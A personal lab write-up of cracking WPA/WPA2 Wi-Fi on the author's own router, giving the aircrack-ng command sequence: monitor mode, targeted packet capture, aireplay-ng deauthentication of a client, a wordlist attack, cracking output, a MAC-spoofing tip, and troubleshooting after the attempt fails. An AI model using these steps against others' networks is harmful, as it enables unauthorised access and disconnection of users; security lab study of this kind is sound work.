Now that we've successfully walked through setting up our router as a WEP access point and cracked it on the Aircrack/WEP Cracking page, let's try attacking a WPA encrypted network.

Note that WPA and WPA2 are different. See below for notes.

The Background

As with the WEP attack we covered, this attack will use aircrack-ng to capture lots and lots of packets, then use those packets to brute-force guess the wireless network's passphrase.

WPA or WPA2?

From here:

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

Here's what the security settings page might look like:

The Hardware

The hardware for simulating this attack on my home network consisted of:

• a router/wireless access point - this router controls the wireless network being attacked
• a laptop running Kali Linux - this is where the attack is being launched from
• a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary

The Software

You'll need a laptop running Kali, which will have aircrack-ng installed. That should be all the software you need.

The Procedure

Set Router to WPA

Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.

Now let's pick an easy password, for the sake of example. Like, uh, the word password.

Now we've got our WPAWPA2-enabled router with our super-secure password of "password" - time to get to work.

Check Wireless Devices

Now that you have your WPAWPA2 network enabled, open up your Kali laoptop. Check the wireless devices available on the computer:

$ iwconfig

Once again, we'll be using the Panda Wireless USB dongle at wlan2.

Switch Wireless Device to Monitor Mode

Now use Aircrack to put the wireless device into monitoring mode:

$ airmon-ng start wlan2

This will take wlan2 down and replace it with wlan2mon.

Now we're ready to scan available networks and find our WPAWPA2 router.

Scan Networks

Now you can scan the wireless access points around you by running:

airodump-ng wlan2mon

Make a note of your target router's channel number and MAC address.

Begin the Attack

Tip: you should probably change your mac address before you get started. See Kali/Change MAC Address

Window 1: Monitor Traffic on the Network

In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:

$ airodump-ng --bssid AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon

Connect Third Party to Network

The weakness we're taking advantage of in WPA is the handshake process: when a client authenticates with the network and sends the encrypted password so the network can verify the client. If an attacker captures packets during this handshake process, they have the encrypted password and can try and crack it by brute force.

What this means for us is, we have to witness the handshake process. So don't connect your third party to the network until you're ready and monitoring traffic.

When you're ready, connect your third party device to the network.

Window 2: Artificially Stimulate Packet Traffic

WARNING: The purpose of this step is unclear.

Note: Before doing the following step, you should close any terminal window that is running a scan of all available networks. This type of scan causes the card to constantly hop around on channels, which will cause errors about a mismatching channel between your target and your wireless device.

In window 2, we'll use aireplay to craft packets:

$ ifconfig
$ aireplay-ng --deauth 1 -a <target mac address> -c <third party mac address> wlan2mon

This will generate fake deauthentication packets, making the third party client connected to the wireless network think they've been deauthenticated, and thus re-sending their authentication credentials (including their password).

This is Attack Mode Zero in the Aircrack manual.

Analysis

First Attempt

Now we've got what we need in our network capture file. Let's try and crack this password.

I downloaded a list of the 10,000 most common passwords (hint: ours is number one on the list) from SecLists on GitHub.

Run Aircrack against the captured data to crack the WPA key, specifying the 10k most common passwords as my wordlist:

aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap 
Opening aircrack_output-05.cap
Read 81013 packets.

   #  BSSID              ESSID                     Encryption

   1  74:85:2A:97:5B:08  Walrus                    WPA (1 handshake)

Choosing first network as target.

Opening aircrack_output-05.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 192 keys tested (1269.55 k/s)

                   [00:00:00] 392 keys tested (1287.03 k/s)
                       Current passphrase: cadillac                   
                   [00:00:00] 592 keys tested (1298.17 k/s)
                       Current passphrase: mariners                   
      Master Key   [00:00:00] 788 keys tested (1293.03 k/s)D8 A2 0A 61 
                       Current passphrase: commando                    
      Master Key   [00:00:00] 988 keys tested (1293.68 k/s)53 1E 22 F4 
      Transient Key  : Current passphrase: films+pic+galeries          
      Master Key   [00:00:00] 1188 keys tested (1297.01 k/s)2 B4 8F 19 
      Transient Key  : Current passphrase: vikings1                    
      Master Key   [00:00:01] 1384 keys tested (1298.15 k/s)D 64 31 3D 
      Transient Key  : Current passphrase: hotmail1                    
      Master Key   [00:00:01] 1580 keys tested (1298.30 k/s)C F2 54 2D 
      Transient Key  : Current passphrase: aviation                    
      Master Key   [00:00:01] 1776 keys tested (1298.07 k/s)9 65 C7 52 
      Transient Key  : Current passphrase: riffraff                    
      Master Key   [00:00:01] 1964 keys tested (1293.49 k/s)5 DD 08 AF 
      Transient Key  : Current passphrase: smirnoff                    
      Master Key     : EE 79 F1 E6 3B EF 37 9C A3 19 51 A8 23 CF 0D 46 
      Transient Key  : Current passphrase: skeeter1                    
      Master Key     : 60 C0  2086 24 0B 1C 72 9A 86 17 74 52 08 A8 90 
      Transient Key  : B3 18 CB 94 68 ED 4C 8A 67 DF 0C D6 29 66 8A DB 
      Master Key     : 35 33 85 0F 54 DC 5F 69 24 54 04 CE D6 D6 C9 D9 
      Transient Key  : 2F A2 7C 56 47 49 2B 81 68 37 3B 69 67 FF AF DE 
      EAPOL HMAC     : 14 24 17 98 75 9D E4 AE EB F1 5E BC D2 20 30 CE 
      Transient Key  : 21 B2 25 2B 69 56 60 2D BD 87 18 97 10 07 91 84 
      EAPOL HMAC     : 06 14 B6 BE 7B 44 9C B1 51 65 C4 85 BF F7 FF D9 
                       3D A3 16 29 55 33 10 70 C5 B0 59 B6 11 1B 2C 9E 
      EAPOL HMAC     : 69 89 39 67 39 D8 95 C3 33 26 A7 9B 31 53 B3 B7 

Passphrase not in dictionary 

Quitting aircrack-ng...

Oh?

Subsequent Attempts

I tried a reboot and repeated the steps above, and got the same result.

I tried adding a second client to the network, to increase the number of potential handshakes. I still saw the same problem - passphrase not in dictionary.

I then tried disconnecting and reconnecting to the wireless network from third-party clients - I was using two smartphones - in the hopes that those handshake packets would be captured. However, in every scenario I tried, there was always only 1 handshake captured.

Possible Failure Points

Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airomon-ng)

Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.

Not letting it run long enough? I suspect this may be the issue.

Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.

Wireshark

Can use Wireshark to analyze some of these packet captures. From this site: " Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets."

From this page comes a great explanation of how to analyze those packets.